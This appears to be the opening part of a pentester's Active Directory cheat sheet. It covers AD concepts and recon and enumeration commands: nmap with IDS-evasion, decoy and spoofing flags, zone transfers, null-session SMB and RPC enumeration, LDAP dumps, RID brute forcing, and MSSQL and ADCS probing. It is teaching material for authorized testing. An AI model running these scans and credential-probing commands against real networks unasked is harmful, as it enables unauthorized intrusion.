AF

R
H
AS
IM
R
KA
By
e
ad
M
 🛡️
The Ultimate Active Directory Attack Cheat Sheet: A
Pentester's Field Guide
Mission: This guide is designed to be your comprehensive tactical field manual for
dissecting Active Directory environments. It meticulously integrates common
techniques, tools, and commands in a phased approach, drawing from expert sources
and aiming for exhaustive detail for penetration testers and security professionals.

The Pentester's Code: Remember, this knowledge is potent. You're the professional
responsible for wielding it. The mission is always ethical: to illuminate vulnerabilities, to
test defenses, and ultimately, to help organizations bolster their security posture. This
isn't just about "popping shells"; it's about providing actionable insights and driving
M

real defensive improvements. Stay frosty, keep learning, and always operate with
ad

unwavering integrity and within the legal boundaries of your engagements..

e

"First Of All There Is No Writeup Or Sheet Sheet Can Contains Every Thing Our
This Cheat Sheet Is The Notes And The Details So Far Till Now in My Journey In
By

AD Wish You Like It"

🌍
KA

Getting to Know Active Directory: The Lay of the Land

R

Before we jump into the attacks, let's ensure we're all on the same page with some
IM

foundational AD concepts. Understanding these is key to knowing why certain attacks

work.
AS

●​ The Crown Jewels (ntds.dit): Think of this as the main AD treasure chest. It's a
database file, usually hiding at C:\Windows\NTDS\ntds.dit (though this path can
H

be changed by an administrator). It holds everything about the domain: users,

R

groups, computers, Group Policy information, and most importantly, those

AF

precious password hashes (NTLM hashes and Kerberos keys) for all domain
accounts. Access to this file is paramount for an attacker aiming for full domain
compromise.
●​ The Keepers of the Kingdom (Domain Controllers - DCs): These are the
workhorse servers that host and replicate the AD database (ntds.dit). They handle
who gets in (authentication via Kerberos Key Distribution Center - KDC, LDAP)
and what they can do (authorization). Usually, multiple DCs exist for redundancy
and load balancing. Since Windows 2000, AD uses a multi-master replication
model, meaning (with some exceptions for specific operations/FSMO roles)
changes can be made on any writable DC and will replicate to others.
●​ The Kingdom Itself (Domain): This is your main boundary for administration,
security, and policies in AD. It's a collection of all the users, computers, groups,
 and other objects that share the same directory database, security policies (like
password policy), and trust relationships.
●​ Domains, Trees, and Forests - The Bigger Picture:
○​ Tree: Imagine a family tree of domains. They're hierarchically linked
(parent-child relationships) and share a contiguous DNS namespace (like
corp.example.com with its child europe.corp.example.com). DNS is a critical
component and absolutely essential for AD functionality. Trusts between
domains in a tree are typically two-way and transitive by default.
○​ Forest: Now picture a collection of these "family trees" (one or more domain
trees). They all agree on the basic rules (Schema - defines object classes and
attributes), share some common info (Configuration partition, Global Catalog),
and have trust connections (typically two-way, transitive) between the roots
M

of each tree. The first domain created in a forest is the forest root domain.
ad

●​ Organizational Units (OUs): These are like folders within your domain, used to
organize users, computers, other OUs, or other objects. They often mirror a
e

company's departmental or geographical structure. OUs are crucial for

By

delegating administrative control over specific sets of objects and for applying
specific Group Policies. This is not a security boundary in itself, but a
KA

management one.
●​ Mapping the Network (Sites): Sites in AD usually reflect your physical network
R

layout (e.g., different office locations connected by WAN links, defined by IP

IM

subnets). This helps ensure client computers and member servers authenticate to
and locate services (like DCs or DFS shares) on the closest (in terms of network
AS

topology and cost) servers, which speeds things up and optimizes WAN
bandwidth usage by controlling replication traffic.
H

●​ The Rulebooks (Group Policy Objects - GPOs): GPOs are sets of rules and
R

configuration settings that dictate how systems look and behave for users and
computers. They're the command center for security settings (password policies,
AF

account lockout, audit policies, AppLocker), software rollouts, login scripts,

desktop configurations, and tons more. Most GPO settings translate to registry
key changes on target machines. GPOs are linked to Sites, Domains, or OUs. The
"Group Policy Client" service on Windows machines applies these settings.
●​ SYSVOL: This is a special shared folder replicated across all DCs in a domain (you
can typically get to it via \\<DOMAIN_NAME>\SYSVOL\<DOMAIN_NAME>\Policies
or \\<DC_IP>\SYSVOL\<DOMAIN_NAME>\Policies). It holds all the GPO template
data (settings files like .ini, .pol, .xml, .inf) and scripts (logon, logoff, startup,
shutdown). Authenticated domain users can read most of its contents, making it a
potential source for finding sensitive information (like passwords in old GPP XML
files) or misconfigurations.
●​ The Directory's Language (LDAP - Lightweight Directory Access Protocol):
This is the primary protocol applications and tools use to query and modify
information in Active Directory. It usually runs on TCP port 389 (unencrypted
LDAP) or TCP port 636 (LDAP over SSL/TLS, known as LDAPS). LDAP queries can
be very specific, making it efficient for enumeration. LDAP logs can be
voluminous, sometimes making malicious enumeration harder to spot for
defenders.
●​ The Gatekeeper (Kerberos): This is AD's primary network authentication
protocol. It's a ticket-based system (Ticket Granting Tickets - TGTs, and Ticket
Granting Service tickets - TGSs/service tickets) designed to provide strong
authentication for client/server applications by using secret-key cryptography.
●​ NTLM (New Technology LAN Manager): An older challenge-response
M

authentication protocol.
ad

○​ NTLM as a protocol (MS-NLMP): Used for network authentication. It has

versions: LM (Lan Manager - very weak, DES-based), NTLMv1 (weak,
e

MD4-based), and NTLMv2 (stronger, HMAC-MD5 based, but still weaker than
By

Kerberos).
○​ NTLM as a hash: The NTLM hash (MD4 of UTF-16LE password) is used to
KA

store passwords on disk (in SAM for local accounts, ntds.dit for domain
accounts).
R

○​ While less preferred than Kerberos, NTLM is often still enabled for
IM

compatibility. Its presence opens up attack vectors like Pass-the-Hash and

NTLM relay.
AS

●​ Local Password Stash (SAM - Security Accounts Manager): On individual

Windows machines (workstations, member servers, and DCs for their DSRM
H

accounts), the SAM file (C:\Windows\System32\config\SAM) stores NTLM hashes

R

for local user accounts. It's protected by the SYSTEM account.

The Security Enforcer (LSASS - Local Security Authority Subsystem
AF

●​
Service): The lsass.exe process is critical. It handles user logins (interactive,
network, service), security policy enforcement, password changes, and creates
access tokens that define a user's privileges. Because of this role, LSASS memory
often contains credentials (plaintext passwords, NTLM hashes, Kerberos
tickets/keys) for recently logged-on users and active service accounts, making it
a prime target for credential dumping. LSA Protection (PPL) and Credential Guard
can make this harder.
●​ SAMR (Security Account Manager Remote Protocol): A legacy, SMB-based
protocol that can be used for enumerating users, groups, and other domain
information. It's slower and provides less information than LDAP but might be
useful if LDAP is restricted.
●​ PKI (Public Key Infrastructure) & ADCS (Active Directory Certificate
Services): ADCS allows organizations to manage their own PKI, issuing digital
certificates for authentication, encryption, and signing. Components include
Certificate Authority (CA), Certificate Templates, Enrollment Services, Certificate
Revocation Lists (CRLs), Online Certificate Status Protocol (OCSP).
Misconfigurations can lead to severe vulnerabilities. ADCS integrates tightly with
AD DS.
○​ Certificate Templates: Predefined configurations for certificates (purpose,
key size, validity, issuance policies). Stored as AD objects
(pKICertificateTemplate).
○​ Enrollment Services: Enterprise CAs publish themselves here. Clients find
CAs based on objects in this container.
M

○​ NTAuthCertificates Object: Defines CA certificates trusted for AD

ad

authentication. Client certs used for AD auth must be signed by a CA in this

store.
e

○​ AIA (Authority Information Access) Container: Hosts intermediate and

By

cross-CA certificates for chain validation.

●​ Trusts: Relationships between domains/forests allowing users from one to access
KA

resources in another.
○​ Types: Parent-Child, Tree-Root (intra-forest, transitive by default); External
R

(inter-forest, non-transitive by default, SID filtering usually enabled); Forest

IM

(inter-forest, transitive, SID filtering can be complex). Shortcut/Cross-Link

(intra-forest, optimize auth paths). Realm (Windows to non-Windows
AS

Kerberos).
○​ Direction: Direction of trust is opposite to direction of access (e.g., Domain A
H

trusts Domain B means users in B can access resources in A).

R

○​ Authentication Levels (Cross-Forest): Forest-wide (intra-forest default),

Domain-wide, Selective Authentication (most secure, requires
AF

"Allowed-To-Authenticate" right on resource's DACL for trusted principal).

○​ SID Filtering: Security mechanism on trusts (especially external/forest) to
prevent SIDs from a trusted domain/forest from granting unintended
privileges in the trusting domain/forest (e.g., filtering well-known SIDs or SIDs
not belonging to the trusted domain).
●​ SCCM (System Center Configuration Manager / MECM / ConfigMgr): System
management software for managing large groups of Windows-based computers.
Used for patch management, software distribution, OS deployment. Components:
Primary Server, Site Database (MSSQL), SMS Provider, Distribution Point (DP),
Management Point (MP).
●​ MSSQL Server: Relational database management system. Often integrated with
 AD. Uses Transact-SQL (T-SQL).
●​ Microsoft Exchange Server: Email, calendaring, contacts, tasks. Components:
Autodiscover, Outlook Web App (OWA), Exchange Web Services (EWS),
MAPI/HTTP, ActiveSync.

Phase 1: Reconnaissance & Enumeration - Knowing Your Target

🗺️
Your Goal Here: To suck up every piece of information you can about the target's
Active Directory setup. You're looking for chinks in the armor, high-value targets
(Domain Admins, other privileged users like server admins/helpdesk/developers,
executives), soft targets (weak/old passwords, never-logged-in accounts), network
topology (based on AD sites, IP ranges), Group Policy weaknesses and protections,
M

software deployments (e.g., SCCM), Exchange configurations, MSSQL instances,

ad

ADCS setup, trust relationships, services and service accounts, delegation rights, and
pathways for your attack. Think of this as drawing a detailed map of the battlefield.
e

🚪
By

1.1 Network & Host Discovery: Who's Home and What Doors Are Open?
Your Goal Here: Find out which machines are alive on the network, what ports they have open,
KA

and what services are listening on those ports.

Pro Tip: Start wide, then zoom in. External scanning (if applicable) uses different assumptions
R

than internal scanning. Consider the assessment type (black-box, grey-box, white-box) and
IM

client-imposed restrictions (e.g., testing from a managed VDI with limited tools).
Your Toolkit & Commands:
AS

●​ Nmap (The Network Mapper's Best Friend)

○​ Finding Live Hosts (Ping Sweeps):
H

■​ Command:​
R

nmap -sn <IP_Range/CIDR>​

AF

■​ Purpose: No port scan (ping sweep only). Discovers live hosts using
ICMP, ARP, and TCP ACK/SYN on common ports.
■​ <IP_Range/CIDR>: Target network (e.g., 192.168.1.0/24).
■​ Command:​
nmap -PE -PS445 -PA80 -PP -sn <IP_Range/CIDR>​

■​ Purpose: More thorough host discovery using ICMP echo (-PE), TCP
SYN to port 445 (-PS445), TCP ACK to port 80 (-PA80), and IP Protocol
Ping (-PP). No port scan (-sn).
■​ Command:​
nmap -sP <IP_Range/CIDR> -oN live_hosts.txt​
 ​
(Older syntax for -sn)
■​ Purpose: Ping sweep, saves live hosts to live_hosts.txt.
■​ Host Discovery Types: -PE (ICMP Echo), -PP (ICMP Timestamp), -PM
(ICMP Address Mask), -PS<portlist>, -PA<portlist>, -PU<portlist>,
-PY<portlist>, -PR (ARP Ping - local, fast, reliable), -Pn or -P0 (Skip host
discovery).
○​ Basic Port Scanning (TCP):
■​ Command:​
nmap -sT <Target_IP>​

■​ Purpose: TCP Connect Scan (completes full handshake). Reliable but

M

noisy.
ad

■​ Command:​
nmap -sS <Target_IP>​
e
By

■​ Purpose: TCP SYN Scan ("half-open" scan). Stealthier, often needs

root/admin. Default if privileges allow.
KA

■​ Command:​
nmap -F <Target_IP>​
R
IM

■​ Purpose: Fast scan of the most common 100 ports from

nmap-services.
AS

■​ Command:​
nmap -p <Port_List> <Target_IP>​
H

​
(e.g., -p 80,443,3389 or -p T:22,U:53,161)
R

■​ Purpose: Scan specific ports.

AF

■​ Command:​
nmap -p- <Target_IP>​

■​ Purpose: Scan all TCP ports (1-65535). Can be very slow.

■​ Command:​
nmap --top-ports <Number> <Target_IP>​

■​ Purpose: Scan the <Number> most common TCP ports.

■​ Command:​
nmap -r <Target_IP>​
 ■​ Purpose: Scan ports sequentially, not randomized.
○​ UDP Scanning:
■​ Command:​
nmap -sU <Target_IP>​

■​ Purpose: Scans common UDP ports. Can be slow and less reliable.
■​ Command:​
nmap -sU --top-ports 20 <Target_IP>​

■​ Purpose: Scans the top 20 most common UDP ports.

■​ Command:​
nmap -sU --top-ports 100 -oN nmap-udp-initial.txt <Target_IP>​
M
ad

○​ Service Version & OS Detection:

■​ Command:​
e

nmap -sV <Target_IP>​

By

■​ Purpose: Attempts to determine service versions on open ports.

KA

■​ Command:​
nmap -sV --version-intensity <0-9>​
R

​
IM

(Default 7; higher is more thorough)

■​ Command:​
AS

nmap -sV --version-trace <Target_IP>​

​
(Debug version scan)
H

■​ Command:​
R

nmap -O <Target_IP>​
AF

■​ Purpose: Attempts to determine the operating system. Usually needs

root/admin and an open & closed TCP port.
■​ Command:​
nmap -O --osscan-limit​
​
(Limit OS detection to promising targets)
■​ Command:​
nmap -O --osscan-guess <Target_IP>​
​
(More aggressive OS guessing)
 ■​ Command:​
nmap -A <Target_IP>​

■​ Purpose: Aggressive scan. Enables OS detection (-O), version

detection (-sV), default script scanning (-sC), and traceroute
(--traceroute). Noisy.
○​ Comprehensive Initial Scan Example:​
nmap -sS -sV -O -sC -T4 -p- -oA nmap_tcp_initial_$(date
+%Y%m%d)_<TargetName> <Target_IP_or_Range>​
​
(Save all formats)
○​ Nmap Scripting Engine (NSE):
M

■​ Command:​
ad

nmap -sC <Target_IP>​

​
e

or​
By

nmap --script default <Target_IP>​

KA

■​ Purpose: Runs the default set of "safe" NSE scripts.

■​ Command:​
R

nmap --script discovery <Target_IP>​

IM

■​ Purpose: Runs scripts categorized for host/service discovery.

■​ Command:​
AS

nmap --script vuln <Target_IP>​

H

■​ Purpose: Runs scripts that check for known vulnerabilities. Use with
R

caution and proper authorization.

AF

■​ Command:​
nmap --script <ScriptName1>,<ScriptName2> <Target_IP>​

■​ Purpose: Runs specific, comma-separated NSE scripts.

■​ Command:​
nmap --script "smb-*" <Target_IP>​
​
(e.g., smb-os-discovery, smb-enum-shares, smb-vuln-*)
■​ Command:​
nmap --script "ldap-*" <Target_IP>​
​
 (e.g., ldap-search -b "dc=example,dc=com" "(objectClass=*)")
■​ Command:​
nmap --script "rpc-*" <Target_IP>​

■​ Command:​
nmap --script "dns-*" <Target_IP>​

■​ Command:​
nmap --script "http-*" <Target_IP>​

■​ Command:​
nmap <ip> -p 80,443 --script=http-shellshock --script-args
M

uri=/cgi-bin/xx.cgi​
ad

■​ Purpose: Example of running a specific script (http-shellshock)

e

against ports 80 and 443, with script-specific arguments (uri).

By

■​ Command:​
nmap --script-help <ScriptName>​
KA

​
(Help for a script)
R

○​ Timing & Performance:

IM

■​ Commands:​
nmap -T<0-5> <Target_IP>​
AS

​
or​
nmap -T<paranoid|sneaky|polite|normal|aggressive|insane> <Target_IP>​
H
R

■​ Purpose: Control scan speed and stealth. T0 is slowest/stealthiest, T5

AF

is fastest/noisiest. T3/T4 are common.

■​ Command:​
nmap --min-rate <PacketsPerSec> <Target_IP>​
nmap --max-rate <PacketsPerSec> <Target_IP>​

■​ Purpose: Ensures Nmap sends at least/at most <PacketsPerSecond>.

■​ Command:​
nmap --max-retries <Number> <Target_IP>​
​
(Default 10)
■​ Purpose: Specifies the maximum number of port scan probe
 retransmissions.
■​ Other timing options:​
nmap --ttl <time_value> <Target_IP>​
nmap --min-parallelism <num> --max-parallelism <num> <Target_IP>​
nmap --min-hostgroup <num> --max-hostgroup <num> <Target_Range>​
nmap --initial-rtt-timeout <time> --max-rtt-timeout <time>
--min-rtt-timeout <time> <Target_IP>​
nmap --scan-delay <time> --max-scan-delay <time> <Target_IP>​
nmap --defeat-rst-ratelimit <Target_IP>​
nmap --host-timeout <time> <Target_IP>​
​
(e.g., 10m)
M

○​ Firewall/IDS Evasion & Spoofing (Use ethically and with authorization):

ad

■​ nmap -f <Target_IP>​
​
e

(Fragment packets - 8-byte frags),​

By

nmap --mtu <MTU> <Target_IP>​

KA

■​ nmap -D RND:<number_of_decoys> <Target>​

​
R

or​
nmap -D <decoy1,decoy2,ME,...> <Target>​
IM

■​ nmap -sI <zombie_host>:<probe_port> <Target>​

AS

​
(Idle Zombie Scan)
H

■​ nmap --source-port <portnumber> <Target_IP>​

R

​
AF

or​
nmap -g <portnumber> <Target_IP>​

■​ nmap --data <hex_string> <Target_IP>​

​
or​
nmap --data-string <string> <Target_IP>​
​
or​
nmap --data-length <size> <Target_IP>​
 ■​ nmap --randomize-hosts <Target_Range>​

■​ nmap --spoof-mac <MAC_address|0|vendor_name> <Target_IP>​

​
(Local Ethernet segment only)
■​ nmap --badsum <Target_IP>​
​
(Send bad checksums)
○​ Advanced Scan Types:
■​ nmap -sN <Target_IP>​
​
(TCP NULL),​
M

nmap -sF <Target_IP>​

ad

​
(TCP FIN),​
e

nmap -sX <Target_IP>​

By

​
(Xmas Scan) (Stealthy, RFC 793 based, not for Windows)
■​ nmap -sA <Target_IP>​
KA

​
(TCP ACK Scan - map firewall rules, filtered/unfiltered)
R

■​ nmap --scanflags <flags> <Target_IP>​

IM

​
(Custom TCP flags: URG, ACK, PSH, RST, SYN, FIN)
AS

■​ nmap -sO <Target_IP>​

​
H

(IP Protocol Scan - TCP, UDP, ICMP, IGMP etc.)

R

○​ Output Formats:
AF

■​ Command:​
nmap -oN normal_output.txt <Target_IP>​

■​ Command:​
nmap -oG grepable_output.gnmap <Target_IP>​

■​ Command:​
nmap -oX xml_output.xml <Target_IP>​

■​ Command:​
nmap -oA <Basename> <Target_IP>​
​
 (Saves in All major formats: .nmap, .xml, .gnmap)
○​ DNS Resolution: -R (Force reverse DNS), -n (Disable reverse DNS - faster),
--system-dns, --dns-servers <servers>
○​ Scanning for AD-Specific Ports:
■​ Command:​
nmap -p
53,88,135,137,139,389,445,464,593,636,1433,3268,3269,5985,5986,9389,491
52-65535 <Target_DC_or_Range>​

■​ Purpose: Scans a comprehensive list of common AD-related ports,

including RPC dynamic range.
■​ Key AD Ports to Know: DNS (53/tcp/udp), Kerberos (88/tcp/udp), RPC
M

EPMAP (135/tcp/udp), NetBIOS Name Service (137/udp), NetBIOS

ad

Datagram Service (138/udp), NetBIOS Session Service (139/tcp), LDAP

(389/tcp/udp), SMB (445/tcp), Kerberos Pwd Change (464/tcp/udp), RPC
e

over HTTP (593/tcp), LDAPS (636/tcp), MSSQL (1433/tcp), Global Catalog

By

LDAP (3268/tcp), Global Catalog LDAPS (3269/tcp), WinRM HTTP

(5985/tcp), WinRM HTTPS (5986/tcp), AD Web Services (ADWS)
KA

(9389/tcp), RPC Dynamic Ports (Default: 49152-65535/tcp for Win2008+;

Older: 1025-5000/tcp).
R

●​ Masscan (For very large networks - extremely fast asynchronous port

IM

scanner)
○​ Command:​
AS

masscan <IP_Range/CIDR> -p<Port(s)> --rate <Rate>​

​
H

(TCP)
■​ Purpose: Extremely fast TCP port scanner.
R

■​ <Port(s)>: Ports to scan (e.g., 80, 0-65535).

AF

■​ <Rate>: Packets per second (e.g., 100000). Use high rates with caution.
○​ Command:​
masscan <IP_Range/CIDR> -pU:<Port(s)> --rate <Rate>​
​
(UDP)
■​ Purpose: Extremely fast UDP port scanner.
○​ Tool Link: robertdavidgraham/masscan (GitHub)
●​ Ping / fping:
○​ Command:​
ping <IP_Address>​
 ■​ Purpose: Sends ICMP echo requests to check host liveness.
○​ Command:​
fping -a -g <IP_Range/CIDR> 2>/dev/null​

■​ Purpose: Pings a range and shows only live (-a) hosts. -g generates the
range. Errors suppressed.
●​ Netdiscover:
○​ Command:​
sudo netdiscover -r <IP_Range/CIDR> -i <interface>​

■​ Purpose: Discovers hosts on the local network using ARP requests. -r

specifies the range, -i the interface.
M

●​ Metasploit Scanning Modules: auxiliary/scanner/portscan/tcp,

ad

auxiliary/scanner/discovery/arp_sweep
●​ Searchsploit:​
e

searchsploit <keyword_e.g_apache_2.4.51>​
By

searchsploit <EDB-ID> -m <Output_Location>​

KA

●​ Passive Network Sniffing (Wireshark, tcpdump):

○​ On attack host:​
R

sudo tcpdump -i <interface> -w capture.pcap​

IM

○​ Look for ARP, MDNS, NBT-NS, DHCP, DNS traffic to identify active hosts and
AS

potential services.
○​ Wireshark filter examples: arp, mdns, nbns, bootp, dns.
H

🗺️
1.2 Mapping the AD Structure & Finding Services (DNS, SMB, LDAP, RPC, MSSQL,
R

Exchange, SCCM, ADCS)

AF

Your Goal Here: Figure out where the Domain Controllers are, understand the domain and
forest layout, identify trust relationships, and pinpoint AD-specific services.
Pro Tip: LDAP is excellent for structured queries. SAMR is a legacy alternative. DNS (SRV
records), SMB, and RPC are key.
Your Toolkit & Commands:
●​ DNS Digging:
○​ Dnsrecon:
■​ Command:​
dnsrecon -d <Domain_Name> -t srv​

■​ Purpose: Enumerates DNS SRV records (often point to AD services).

 ■​ Command:​
dnsrecon -d <Domain_Name> -a​
​
(Attempts AXFR zone transfer)
■​ Command:​
dnsrecon -d <Domain_Name> -t std​
​
(Standard record enumeration)
○​ Nslookup:
■​ Command:​
nslookup -type=SRV _ldap._tcp.dc._msdcs.<Domain_Name>
[<DNS_Server_IP>]​
M
ad

■​ Purpose: Queries DNS for SRV records for LDAP services (finds DCs).
■​ Command:​
e

nslookup -type=SRV _kerberos._tcp.dc._msdcs.<Domain_Name>

By

[<DNS_Server_IP>]​
KA

■​ Purpose: Finds Kerberos KDCs (usually DCs).

■​ Command:​
R

nslookup -type=SRV _gc._tcp.dc._msdcs.<Domain_Name>

IM

[<DNS_Server_IP>]​

■​ Purpose: Finds Global Catalog servers.

AS

■​ Also useful: _ldap._tcp.pdc._msdcs.<Domain_Name> (PDC Emulator)

○​ Nltest (Windows built-in):
H

■​ Command:​
R

nltest /dclist:<Domain_Name>​
AF

■​ Purpose: Lists all Domain Controllers for the specified domain.

■​ Command:​
nltest /dnsgetdc:<Domain_Name>​

■​ Purpose: Queries DNS for a DC and displays its capabilities.

■​ Command:​
nltest /domain_trusts​

■​ Purpose: Shows domain trust relationships for the current domain.

■​ Command:​
 nltest /server:<ServerName> /sc_query:<DomainName>​
​
(Secure channel status)
○​ Dig (Linux DNS tool):
■​ Command:​
dig @<DNS_Server_IP> <Domain_Name> AXFR +nocookie​

■​ Purpose: Attempts a DNS zone transfer. Highly valuable if successful,

often blocked.
■​ Command:​
dig srv _ldap._tcp.dc._msdcs.<Domain_Name> @<DNS_Server_IP>​
M

■​ Purpose: Similar to nslookup for finding LDAP SRV records.

ad

○​ PowerShell (ADModule or built-in):

■​ Command:​
e

Resolve-DnsName -Name _ldap._tcp.dc._msdcs.<Domain_Name> -Type

By

SRV -Server <DNS_Server_IP>​

KA

■​ Purpose: PowerShell equivalent for querying SRV records.

○​ adidnsdump:​
R

adidnsdump -u <domain\user> -p <password> ldap://<DC_IP> -r​

IM

​
(Resolve unknown records)
●​ SMB/NetBIOS Snooping:
AS

○​ enum4linux-ng:
■​ Command:​
H

enum4linux-ng -A <Target_IP_or_DC>​
R

​
AF

(Comprehensive "do everything")

■​ Command:​
enum4linux-ng -U <Target_IP_or_DC>​
​
(Enumerates users)
■​ Command:​
enum4linux-ng -S <Target_IP_or_DC>​
​
(Enumerates shares)
■​ Also: -P (password policy), -G (groups), -o (OS info).
○​ nbtscan:
 ■​ Command:​
nbtscan -r <IP_Range/CIDR>​
​
(Scans range for NetBIOS info)
■​ Command:​
nbtscan <Target_IP>​
​
(Scans single host)
○​ CrackMapExec (CME):
■​ Command:​
crackmapexec smb <IP_Range/CIDR>​
​
M

(Basic SMB enum: OS, null sessions, SMB signing)

ad

■​ Command:​
crackmapexec smb <IP_Range/CIDR> --shares​
e
By

■​ Command:​
crackmapexec smb <Target_IP> -u '' -p '' --users​
KA

​
(Null session user enum)
■​ Command:​
R

crackmapexec smb <Target_IP> -u <user> -p <pass> --rid-brute

IM

[MAX_RID]​
AS

○​ smbmap:
■​ Command:​
H

smbmap -H <Target_IP>​
R

​
AF

(List shares anonymously)

■​ Command:​
smbmap -u <user> -p <pass> -d <domain> -H <Target_IP> -R
<ShareName> --dir-only​
​
(Recursive dir listing)
●​ LDAP Interrogation (The core of AD enumeration):
○​ ldapsearch (Linux OpenLDAP tool):
■​ Anonymous RootDSE:​
ldapsearch -x -H ldap://<DC_IP> -s base -b "" "(objectClass=*)"
namingContexts defaultNamingContext supportedLDAPVersion
 supportedSASLMechanisms domainFunctionality forestFunctionality +​

■​ Purpose: Critical first step. Gets naming contexts (base DNs for
further queries) and server capabilities. -x for simple auth, -H for
LDAP URI, -s base for base search, -b "" for empty base (rootDSE), +
for operational attributes.
■​ Anonymous Users:​
ldapsearch -x -H ldap://<DC_IP> -b "<defaultNamingContext>"
"(&(objectClass=user)(objectCategory=person))" sAMAccountName cn
description pwdLastSet lastLogon userAccountControl whenCreated
whenChanged distinguishedName memberOf​
M

■​ Anonymous Groups:​
ad

ldapsearch -x -H ldap://<DC_IP> -b "<defaultNamingContext>"

"(objectClass=group)" sAMAccountName description member
e

adminCount​
By

■​ Anonymous Computers:​
KA

ldapsearch -x -H ldap://<DC_IP> -b "<defaultNamingContext>"

"(objectClass=computer)" dNSHostName operatingSystem
R

operatingSystemServicePack servicePrincipalName
IM

msDS-AllowedToDelegateTo userAccountControl​
AS

■​ Authenticated:​
ldapsearch -x -H ldap://<DC_IP> -D "<UserDN_or_UPN>" -w "<Password>"
H

-b "<BaseDN>" "<LDAP_Filter>" <Attributes_to_return>​

R

■​ -D: Bind DN (e.g., cn=user,dc=corp,dc=local or [email protected]).

AF

■​ -w: Password.
○​ ADExplorer (Sysinternals): Visual AD browsing, snapshots for offline
analysis.
○​ JXplorer / LDAPAdmin: Cross-platform GUI LDAP browsers.
○​ PowerView (PowerSploit PowerShell module):
■​ Get-NetDomain​
​
or​
Get-Domain​

■​ Get-NetDomainController​
 ​
or​
Get-DomainController​

■​ Get-NetForest​
​
or​
Get-Forest​

■​ Get-NetForestDomain​
​
or​
M

Get-ForestDomain​
ad

■​ Get-NetDomainTrust​
e

​
By

or​
Get-DomainTrust​
KA

■​ Get-NetForestTrust​
​
R

or​
IM

Get-ForestTrust​
AS

■​ Get-DomainPolicy​
​
H

(Shows password policy, Kerberos, lockout)

R

■​ (Get-DomainPolicy)."systemaccess"​
AF

​
(Password & lockout policies)
■​ (Get-DomainPolicy)."kerberospolicy"​
​
(Kerberos ticket lifetimes)
○​ ADModule (Built-in PowerShell module):
■​ Get-ADDomain​

■​ Get-ADDomainController -Discover -Service PrimaryDC​

​
(Finds PDC Emulator)
■​ Get-ADForest​
 ■​ Get-ADTrust -Filter *​

○​ windapsearch.py:​
windapsearch.py --dc-ip <DC_IP> -U​
windapsearch.py --dc-ip <DC_IP> -u <user> -p <pass> --da​
​
Also --all-attributes, --custom <filter>.
○​ ldapdomaindump (Python tool):
■​ Command:​
ldapdomaindump ldap://<DC_IP> -u <DOMAIN\USER> -p <PASSWORD> -o
<Output_Dir>​
M
ad

■​ Purpose: Dumps domain info (users, groups, computers, policies) into

HTML/JSON for offline review.
e

●​ RPC Probing:
By

○​ rpcclient (Linux Samba tool):

■​ Command:​
KA

rpcclient -U "" -N <Target_IP>​

​
R

(Attempts null session connection)

IM

■​ If successful, sub-commands: srvinfo, enumdomusers, enumdomgroups,

queryuser <RID>, lookupnames <Name>, lookupsids <SID>, lsaquery.
■​ Authenticated:​
AS

rpcclient -U "<DOMAIN\USER>%<PASSWORD>" <Target_IP> -c

"<command>"​
H
R

○​ rpcdump.py (Impacket Python script):

AF

■​ Command:​
rpcdump.py <Target_IP>​
​
(Lists available RPC endpoints)
■​ Command:​
rpcdump.py @<Target_IP>​
​
(Queries RPC endpoint mapper directly)
○​ Nmap NSE for RPC:​
nmap --script rpcap-brute,rpcinfo <Target_IP>​
●​ MSSQL Enumeration:
○​ Nmap:​
nmap -p 1433 --script
ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-s
ql-dac,ms-sql-dump-hashes <Target_IP>​

○​ PowerUpSQL:​
Import-Module PowerUpSQL.ps1​
Get-SQLInstanceDomain -Verbose​
Get-SQLServerInfo -Instance <SQL_Instance> -Verbose​
Get-SQLServerLink -Instance <SQL_Instance> -Verbose​
M

○​ CrackMapExec:​
ad

cme mssql <Target_IP> -u <user> -p <pass> --links, --databases,

--impersonate-users​
e
By

●​ Exchange Enumeration:
○​ Nmap NSE:​
KA

sudo nmap -sCV --script

http-ntlm-info,http-vuln-cve2017-11774,exchange-enum-users --script-args
R

http-ntlm-info.root=/ews/,exchange-enum-users.fingerprintfile=/usr/share/nm
IM

ap/nselib/data/exchange-fingerprints.txt -p80,443 <Exchange_IP>​

AS

○​ ntlmscan (Python):​
python3 ntlmscan.py --host https://<Exchange_IP>/ews/exchange.asmx​
H
R

○​ Ruler, MailSniper for deeper interaction (e.g., Invoke-PasswordSprayOWA,

Get-GlobalAddressList).
AF

○​ Version enum:​
curl
https://<Exchange_IP>/ecp/Current/exporttool/microsoft.exchange.ediscovery.
exporttool.application -k | xmllint --format | grep version​

●​ SCCM (Microsoft Endpoint Configuration Manager) Enumeration:

○​ sccmhunter:​
python3 sccmhunter.py find -u <User> -p <Pass> -d <Domain> -dc-ip <DC_IP>​
python3 sccmhunter.py smb ... -save​
​
(profile, list shares, PXEBoot vars).
 ○​ SharpSCCM: .NET tool for SCCM enumeration and abuse.
○​ LDAP: Look for CN=System Management,CN=System container. Object
classes mssmsmanagementpoint, mssmssite.
●​ ADCS (Active Directory Certificate Services) Enumeration:
○​ Certify.exe (Windows): Certify.exe find /vulnerable, Certify.exe cas (list CAs).
○​ Certipy (Linux/Python):​
certipy find -u '<user>@<domain>' -p '<pass>' -dc-ip <DC_IP> -vulnerable
-stdout​
certipy find ... -bloodhound​

○​ PSPKI (PowerShell): Get-CertificationAuthority,

Get-CertificationAuthorityAcl.
M

○​ Check Cert Publishers group membership:​

ad

net localgroup "Cert Publishers"​

​
e

(on DC).
By

○​ LDAP: CN=Public Key

Services,CN=Services,CN=Configuration,DC=<domain>,DC=<com>.
KA

Containers: Certification Authorities, Enrollment Services, Certificate

Templates, NTAuthCertificates.
R

📂
1.3 Domain Object Enumeration (Users, Groups, Computers, GPOs, OUs, ACLs,
IM

Trusts)
Your Goal Here:
AS

●​ Pinpoint specific users (privileged, service accounts, stale accounts).

H

●​ Identify groups (membership, admin groups, groups with modifiable ACLs).

R

●​ Enumerate computers (OS, roles, delegation settings).

Analyze GPOs (settings, linked OUs, vulnerable GPPs).
AF

●​
●​ Understand OU structure (GPO linkage, delegation of control).
●​ Examine ACLs (permissions on objects, looking for misconfigurations like
GenericAll, WriteDACL, WriteOwner).
●​ Map trust relationships.

Pro Tip:
●​ Look for descriptions (e.g., password in description).
●​ Check pwdLastSet (old passwords) and lastLogonTimestamp (inactive accounts).
●​ Identify SPNs (Kerberoasting targets).
●​ Analyze userAccountControl flags (delegation settings, DONT_REQ_PREAUTH).
